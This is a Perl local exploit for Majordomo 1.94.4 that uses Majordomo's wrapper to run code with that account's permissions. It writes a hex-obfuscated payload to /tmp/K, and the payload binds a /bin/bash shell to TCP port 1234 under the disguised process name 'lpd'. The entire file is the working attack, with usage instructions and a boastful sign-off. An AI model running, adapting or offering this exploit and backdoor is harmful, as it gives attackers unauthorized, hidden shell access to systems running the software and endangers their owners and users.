#!/usr/bin/perl
# binds a shell at port 1234
# NeMeS||y
# dragon@shellnow.it
#
# Majordomo  1.94.4 Tested on RedHat 7.x & Slackware 8
# -Local-
# Adivisory By Marco van Berkum http://ws.obit.nl.
################################################
$d = $ARGV[0];
unless ($ARGV[0])
  {
  print "\n\nUsage : ".$0." <Majordomo's home> \n";
  print "Ex   .: ".$0." /home/majordomo\n\n";
  print "binds a shell at port 1234 with Majordomo's permissions\n\n";
  exit;
  }
$HexK = "\x75\x73\x65\x20\x53\x6f\x63\x6b\x65\x74\x3b\x24\x70\x6f\x72\x74\x3d\x31\x32\x33\x34\x3b\x24\x70\x72\x6f\x74\x6f\x3d\x67\x65\x74\x70\x72\x6f\x74\x6f\x62\x79\x6e\x61\x6d\x65\x28\x27\x74\x63\x70\x27\x29\x3b\x24\x63\x6d\x64\x3d\x22\x6c\x70\x64\x22\x3b\x24\x73\x79\x73\x74\x65\x6d\x3d\x27\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x27\x3b\x24\x30\x3d\x24\x63\x6d\x64\x3b\x73\x6f\x63\x6b\x65\x74\x28\x53\x45\x52\x56\x45\x52\x2c\x50\x46\x5f\x49\x4e\x45\x54\x2c\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x2c\x24\x70\x72\x6f\x74\x6f\x29\x20\x6f\x72\x20\x64\x69\x65\x20\x22\x73\x6f\x63\x6b\x65\x74\x3a\x24\x21\x22\x3b\x73\x65\x74\x73\x6f\x63\x6b\x6f\x70\x74\x28\x53\x45\x52\x56\x45\x52\x2c\x53\x4f\x4c\x5f\x53\x4f\x43\x4b\x45\x54\x2c\x53\x4f\x5f\x52\x45\x55\x53\x45\x41\x44\x44\x52\x2c\x70\x61\x63\x6b\x28\x22\x6c\x22\x2c\x31\x29\x29\x20\x6f\x72\x20\x64\x69\x65\x20\x22\x73\x65\x74\x73\x6f\x63\x6b\x6f\x70\x74\x3a\x20\x24\x21\x22\x3b\x62\x69\x6e\x64\x28\x53\x45\x52\x56\x45\x52\x2c\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69\x6e\x28\x24\x70\x6f\x72\x74\x2c\x49\x4e\x41\x44\x44\x52\x5f\x41\x4e\x59\x29\x29\x20\x6f\x72\x20\x64\x69\x65\x20\x22\x62\x69\x6e\x64\x3a\x20\x24\x21\x22\x3b\x6c\x69\x73\x74\x65\x6e\x28\x53\x45\x52\x56\x45\x52\x2c\x53\x4f\x4d\x41\x58\x43\x4f\x4e\x4e\x29\x20\x6f\x72\x20\x64\x69\x65\x20\x22\x6c\x69\x73\x74\x65\x6e\x3a\x20\x24\x21\x22\x3b\x66\x6f\x72\x28\x3b\x20\x24\x70\x61\x64\x64\x72\x3d\x61\x63\x63\x65\x70\x74\x28\x43\x4c\x49\x45\x4e\x54\x2c\x53\x45\x52\x56\x45\x52\x29\x3b\x63\x6c\x6f\x73\x65\x20\x43\x4c\x49\x45\x4e\x54\x29\x7b\x6f\x70\x65\x6e\x28\x53\x54\x44\x49\x4e\x2c\x22\x3e\x26\x43\x4c\x49\x45\x4e\x54\x22\x29\x3b\x6f\x70\x65\x6e\x28\x53\x54\x44\x4f\x55\x54\x2c\x22\x3e\x26\x43\x4c\x49\x45\x4e\x54\x22\x29\x3b\x6f\x70\x65\x6e\x28\x53\x54\x44\x45\x52\x52\x2c\x22\x3e\x26\x43\x4c\x49\x45\x4e\x54\x22\x29\x3b\x73\x79\x73\x74\x65\x6d\x28\x24\x73\x79\x73\x74\x65\x6d\x29\x3b\x63\x6c\x6f\x73\x65\x28\x53\x54\x44\x49\x4e\x29\x3b\x63\x6c\x6f\x73\x65\x28\x53\x54\x44\x4f\x55\x54\x29\x3b\x63\x6c\x6f\x73\x65\x28\x53\x54\x44\x45\x52\x52\x29\x3b\x7d";
$dir_f = "/tmp/K";
open(back,">$dir_f");
print back $HexK;
close(back);
$wrapper = $d."/wrapper";
system("nohup $wrapper perl $dir_f &");
print "\n and now you have a shell at port -> 1234 <- with Majordomo's permissions \n";
print " the backdoor name is \"lpd\"\n\nHave a Fun!!!\n by NeMeS||y\n\n";
__END__